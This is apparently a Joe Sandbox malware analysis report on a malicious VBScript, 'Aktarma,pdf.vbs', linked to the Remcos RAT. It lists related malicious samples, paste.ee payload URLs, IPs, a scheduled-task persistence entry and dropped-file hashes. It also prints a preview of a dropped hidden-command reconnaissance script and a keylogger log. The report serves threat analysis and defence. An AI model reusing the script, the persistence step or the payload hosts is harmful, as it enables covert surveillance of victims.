                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:Aktarma,pdf.vbs
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@13/11@5/5
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 55
                                                                                                  • Number of non-executed functions: 190
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .vbs

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 20.103.156.88, 199.232.210.172, 20.198.118.190, 2.16.158.90, 2.16.158.96, 2.16.158.184, 2.16.158.91, 2.16.158.171, 2.16.158.176, 2.16.158.169, 2.16.158.97, 2.16.158.170, 4.175.87.197, 20.234.120.54, 52.165.164.15, 2.16.158.192, 2.16.158.186, 2.16.158.179, 2.16.158.185, 2.16.158.187, 23.218.208.109, 20.109.210.53, 20.190.177.21, 13.107.246.63, 150.171.28.10
                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, otelrules.afd.azureedge.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com, wns.notify.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, fe3.delivery.mp.microsoft.com, mm-mm.b
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: Aktarma,pdf.vbs

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  10:34:02API Interceptor75x Sleep call for process: powershell.exe modified
                                                                                                  10:34:36API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  10:35:02API Interceptor847126x Sleep call for process: MSBuild.exe modified
                                                                                                  16:34:28Task SchedulerRun new task: RunFile path: wscript.exe s>C:\ProgramData\classers.vbs

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  172.67.187.200geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/1QtpX
                                                                                                  MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/rYCH1
                                                                                                  LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                  • paste.ee/d/0jfAN
                                                                                                  PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/tiRif
                                                                                                  EWW.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/gFlKP
                                                                                                  ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/JxxYu
                                                                                                  Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/Bpplq
                                                                                                  Name.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • paste.ee/d/0kkOm
                                                                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                                                                  • paste.ee/d/s0kJG
                                                                                                  screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                                                  • paste.ee/d/GoCAw
                                                                                                  45.80.158.30173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • sws.swpushroller.eu/swsk/P4.php
                                                                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • sws.swpushroller.eu/swsk/P4.php
                                                                                                  151.101.1.13716547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                    #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                      nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                        1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                          http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                                            https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                                              https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                                                https://www.postman.com/postman-account/Get hashmaliciousUnknownBrowse
                                                                                                                  https://pitch.com/public/f3efe39e-ece6-4e9c-abe8-1a8052876a2fGet hashmaliciousUnknownBrowse
                                                                                                                    http://url1578.fundawithjyoti.com/ls/click?upn=yFeSTx5DQPiItplIvZtCPdAv3GpeMYxjprPyDOCgTw1xm5EF-2BSU-2FZwHfXBSOkRTYIwSi_PM4alGcAZ86A1O3u51J4mEQLFGtubxWdVTg6-2FcJBO1jp9oyNXZ6mQSzeNX-2B7VKKHaPBntWFf6zrDi2LaKqtvUzASDJDri9snRnhQmfVJu93OvrNKf6Snskbo4Mar5fZfKgMrMZV4l2iAuDUHqpnBu4YaiZKY2P5OfELBNW9EfAa-2Bok0-2FIzO3PqWMlvgZ-2Fje-2FUU8UZBB1GxMGbjln9hLRizR8o-2Fr50XlWOzT0j9e1u4nN66dlXcpcm5W2p7cHgy5GE7mk2dn5NzOWuGvU2lGlr0NN3TD0cG7S4-2BjTresT7iZcn-2BAPBTa7I25wE9mA8TVmpfnjR4h9ZIBZWWJUW7TK929wF1RSkjooMmCtEk4K5GC1sj7iJpvWk-2BhZBRiN-2BsTXm3yWxaq8MVvX2pZ37cZLxGXME0rnnb84oAEnXw9piVOzqcTP8hhqQH4ZlHnyNDwBIS4Mav7-2BGywdgWfbuvCEFheFdZoHpKiKAPQnnBUuCY-2FKQjMYjvPsHNMtI4G4rjtmVkrXr9Aw3lrHejW-2FVq1tIkTK6WHtZyqprzbin6N1UrjzZ27Iu09egdWJUN6FoiB0yRpNYIvO0xs4ncpF6m7kT9F7zNhlO4-2Fn41yMLMfCywxEgIGAdzizC6vZalFQqzXfvLP5uQrdsFEvgXTZ1Uq23AFkvmhLmefr5OZh8f5SasfPLx08zJxZeINsv2YigPAW5TK7c9dAoOi32BKFv-2FP5qJIhzdOIWWRkPfDi1GZjxIDHkkUOQsdGXFwKX5GHPFk2DAsz2yAsUZxOKp40NHQm-2BOlBdtsFRs4dO9adR1QT-2F8OCf-2BLxBlXPYley6fhoPj850B2eVJ4DvMsA7QLr-2FX1aPQe8Eh9ozsOqOl-2FWqEH5zP49MOYRxvkitzx89YSOXTqM&c=E,1,-IYx59KsfzGYtK54bJA2fYABiNk3BZVZFDoiFUZPOnduDII2JTWNl4pt0tezpZxBRNlQtMTJXh0gayWDNghKvyhRHgt1ZkW4KYejOeeszJ5dYA,,&typo=1Get hashmaliciousUnknownBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      paste.eeithgreat.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.6
                                                                                                                      xxx.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.6
                                                                                                                      Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.6
                                                                                                                      NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.6
                                                                                                                      Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                                      • 104.21.84.67
                                                                                                                      nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                      • 104.21.84.67
                                                                                                                      1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                      • 104.21.84.67
                                                                                                                      1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                                      • 104.21.84.67
                                                                                                                      asegurar.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.84.67
                                                                                                                      cloudinary.map.fastly.netxxx.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.1.137
                                                                                                                      Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.193.137
                                                                                                                      atthings.docGet hashmaliciousRemcosBrowse
                                                                                                                      • 151.101.65.137
                                                                                                                      16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 151.101.1.137
                                                                                                                      togiveme.docGet hashmaliciousRemcosBrowse
                                                                                                                      • 151.101.129.137
                                                                                                                      greatnew.docGet hashmaliciousRemcosBrowse
                                                                                                                      • 151.101.193.137
                                                                                                                      bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                      • 151.101.129.137
                                                                                                                      nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                      • 151.101.129.137
                                                                                                                      #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                      • 151.101.1.137
                                                                                                                      nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                      • 151.101.1.137
                                                                                                                      bg.microsoft.map.fastly.nettQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      W-2Updated.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      BL COAU7249606620-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcbGet hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      8ehpti2jSS.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                      • 199.232.210.172
                                                                                                                      f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                      • 199.232.214.172
                                                                                                                      geoplugin.netRef#60031796.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                                                      • 178.237.33.50
                                                                                                                      LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                      • 178.237.33.50

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.65.91
                                                                                                                      _.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.66.137
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.193.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 151.101.130.137
                                                                                                                      https://sendgb.com/vdRYC6Nal34?utm_medium=HlyZfLISdD8Bj1iGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.65.229
                                                                                                                      https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                                                                                      • 151.101.194.137
                                                                                                                      https://jdjdhjh.uscourtdocuments.com/A3RjQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 151.101.194.137
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.65.91
                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      securedoc_20241209T071703.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      http://www.cargoforce.co.uk/media/system/js/core.js?1399aaee86665a1dd2ea810af52638f9Get hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      _.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      W-2Updated.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 104.17.249.203
                                                                                                                      1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      UK2NET-ASGBmain_m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 77.92.90.50
                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 88.202.185.180
                                                                                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 46.28.54.10
                                                                                                                      173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 45.80.158.30
                                                                                                                      Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 45.80.158.30
                                                                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 80.209.188.4
                                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 45.80.158.23
                                                                                                                      8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 173.244.199.148
                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 83.170.86.99
                                                                                                                      D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 77.92.65.63

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      6271f898ce5be7dd52b0fc260d0662b3https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      Software_Tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 150.171.27.10
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcbGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      https://app.droplet.io/form/yelEz0Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137
                                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 172.67.187.200
                                                                                                                      • 151.101.1.137

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1310720
                                                                                                                      Entropy (8bit):0.7262998519470576
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0r:9JZj5MiKNnNhoxui
                                                                                                                      MD5:8E5C62035AF434E1BC3505204CE6905F
                                                                                                                      SHA1:7907F9B765E25BC57253816D3B7CDF8AB8BA76ED
                                                                                                                      SHA-256:23E7234583F8493633F3773C983BA3D755671247A14626DD270B3233A292B023
                                                                                                                      SHA-512:7F035976C25C0839C1BE2F6095EC7A269CF67F3FCF6AFDE8B55B45C970974405DEE3F758D55499B53CB358A90F1853AB6CF0C8DE36946BE4F2D5ACC9E02ECCAD
                                                                                                                      Malicious:false
                                                                                                                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x71f4ec36, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1310720
                                                                                                                      Entropy (8bit):0.755566569632113
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
                                                                                                                      MD5:82EEF7F438C900B40157FF30A4E42F09
                                                                                                                      SHA1:F5949C5BC6B3FB8BEC69410FB7AA7832487DEDD7
                                                                                                                      SHA-256:DEF40ADD33757F4B070BDFA6DEDDAEA469542825914BC450F19EB7034688C4AE
                                                                                                                      SHA-512:2510D1AC4A7D5095327177C1D9C73BD4CD66DFC08B77D7876B0408E88BE23F790BCAFD4F6DA7D2CA95E987B5D9CE072B69087B370E8C014D2EB17216A5077662
                                                                                                                      Malicious:false
                                                                                                                      Preview:q..6... .......7.......X\...;...{......................0.e......!...{?.%"...|9.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................Q.$.%"...|9.....................%"...|9..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):16384
                                                                                                                      Entropy (8bit):0.07878150755040941
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:PUYe3nUag3NaAPaU1lgpAUtlAlluxmO+l/SNxOf:8z3XANDPaUiAgmOH
                                                                                                                      MD5:5BA4CC144D428D2D585622F4E806DCB4
                                                                                                                      SHA1:3359E5603D653A9626442B5712719DCE690965A4
                                                                                                                      SHA-256:104E7149B3BD3DD46F5A753D88517BA20F3F4D9FC5D038A9E6843BFC44D13C19
                                                                                                                      SHA-512:2CC5D271CD60F8866B46A9A0F923C431499A68ACD8EE15DF2DF116A9670FF55EBDD792EDF4D7AD5DEBB5B850B30C85DCF03813AD24E39AC23FAF8D42E3230638
                                                                                                                      Malicious:false
                                                                                                                      Preview:ps......................................;...{..%"...|9..!...{?..........!...{?..!...{?..g...!...{?.....................%"...|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\classers.vbs

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):437480
                                                                                                                      Entropy (8bit):5.105403560005336
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
                                                                                                                      MD5:42320E659E8E1885EB96342E52E4EC60
                                                                                                                      SHA1:8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
                                                                                                                      SHA-256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
                                                                                                                      SHA-512:CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
                                                                                                                      Malicious:true
                                                                                                                      Preview:Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

                                                                                                                      C:\ProgramData\remcos\logs.dat

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):194
                                                                                                                      Entropy (8bit):3.4671477228840897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:rhlKlyKvlPNylfUClDl5JWRal2Jl+7R0DAlBG4nLbl+SliFl2cNC3QKhklovDl6v:6lZvdN28Cl55YcIeeDAlbl+Skec/3WAv
                                                                                                                      MD5:1C5D4F402F4C8E9F805CD1CC74C07466
                                                                                                                      SHA1:4882E51ABA55AF1D0152EF5A239DBF8FB7DE65F6
                                                                                                                      SHA-256:7A2096E370204B7A54D8E11D819F1B5047D884DBC50134B12D3D419E46B218BB
                                                                                                                      SHA-512:940AF3FC053536ACC5939F7942579E2A819149F17F62B30F03BD7B600861EEBD4056F9534D3A246AC5F951B3B898FA082A468313A465D1ECFFDA3CAE311D69EE
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                      Preview:....[.2.0.2.4./.1.2./.0.9. .1.0.:.3.4.:.3.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):963
                                                                                                                      Entropy (8bit):5.01340392779544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:tkluJnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluNdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                      MD5:730B9E7B64A360231F44C5A6E39E21BF
                                                                                                                      SHA1:7C483F890F56C5BD9D713F8A8B4B46435D8E401E
